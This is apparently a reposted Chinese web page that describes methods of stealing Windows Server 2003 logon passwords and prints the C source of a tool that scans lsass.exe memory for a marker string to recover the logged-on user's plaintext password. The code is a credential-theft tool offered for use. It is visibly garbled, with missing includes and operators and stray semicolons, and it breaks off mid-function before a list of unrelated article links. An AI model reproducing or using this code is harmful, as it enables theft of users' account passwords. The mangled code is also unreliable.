【在win 2003中得到登陆密码】无论怎说,三种方法中,最稳定,最安全的方法还是使用Gina那种方法.Hijack了winlogn一些API的方法,毕竟是改动了系统的东西,对系统的稳定性来说,会有考验,直接搜索lsass进程内存的方法呢,虽说也是困难,但准确性,成功率却又是低 。
下面的代码使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass内存中"LocalSystem Remote Procedure"这个字符串,因为在相当多的测试中,密码都是保存在有这个字符串的地址后一点的位置中,当然了,很多系统并没有这个字符串,或者就算有,我们得到的都是错误的密码 。
代码: //********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User PassWord On 2003 Box,The Method
//; Used Is Pretty Unwise,But This May Be The Only Way To RevIEw The
//; Logon User"s Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC6.0
//********************************************************************************
#include
#include
#include
#define BaseAddress 0x002b5000;;;;;// The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable
char; Password[MAX_PATH] =// Store The Found Password
// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL; FindPassword(DWORD PID);
intSearch(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL; Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDropnn");
if (!Is2003());;;;;// Check Out If The Box Is 2003
{
printf("The Program Can"t Only Run On Windows 2003 Platformn");
return -1;
}
PID = GetLsassPID() // Get The Lsass.exe PID
if (PID == 0);;;;;// Fail To Get PID If Returning Zerom
{
return -1;
}
FindPassword(PID) // Find The Password From Lsass.exe Memory
return 0;
}
// End main()
//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:;;
//In: char *Buffer;;;;;--> The Memory Buffer To Search;;;;
//; Out: const UINT nSize--> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
//;;;;Since The Password Is Near The Above Location,But It"s Not Always True That
//;;;;We Will Find The Magic String,Or Even We Find It,The Password May Be Located
//;;;;At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i)
{
/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
The Magic String,We Have To Do It Manually And Slowly
*/
if (Buffer == "L")
{
OffSet = 0;
if (strnicmp(&Buffer[iOffSet],"LocalSystem",strlen("LocalSystem")) == 0)
{
OffSet= strlen("LocalSystem")1;
if (strnicmp(&Buffer[iOffSet],"Remote",strlen("Remote")) == 0)
{
OffSet= strlen("Remote")1;
if (strnicmp(&Buffer[iOffSet],"Procedure",strlen("Procedure")) == 0)
推荐阅读
- 破山寺就是今江苏什么境内著名的佛寺禅院 破山寺是现在哪个佛寺禅院
- 抖音火山版在哪直播?抖音火山版直播教程
- 巧妙突破Win 2003系统的种种限制
- 喜马拉雅在哪里设置音质?喜马拉雅音质设置教程
- Windows2003网络服务器安全攻略
- Windows2003下提高FSO安全性
- excel技巧
- 紫金城是现在的故宫吗?
- 王者荣耀帧率显示在哪
- 苹果多个机型或在iPhone15系列后停产 苹果为什么停产以前的机型